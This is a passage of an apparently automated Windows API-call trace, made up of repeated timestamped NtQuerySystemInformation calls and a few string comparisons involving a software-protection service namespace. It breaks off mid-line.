[0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0271.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x28, ResultLength=0x0) [0271.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x28, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd350, Length=0x20, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd350, Length=0x20, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x20, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x20, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6e0, Length=0x28, ResultLength=0x0) [0271.908] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0271.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0271.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0271.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0271.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd530, Length=0x28, ResultLength=0x0) [0271.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0271.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x28, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x28, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x20, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x20, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6e0, Length=0x28, ResultLength=0x0) [0271.919] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x50, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x28, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd530, Length=0x28, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x28, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x28, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x20, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd690, Length=0x38, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x28, ResultLength=0x0) [0271.932] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb90, Length=0x50, ResultLength=0x0) [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x28, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x28, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0271.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x38, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x20, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x20, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 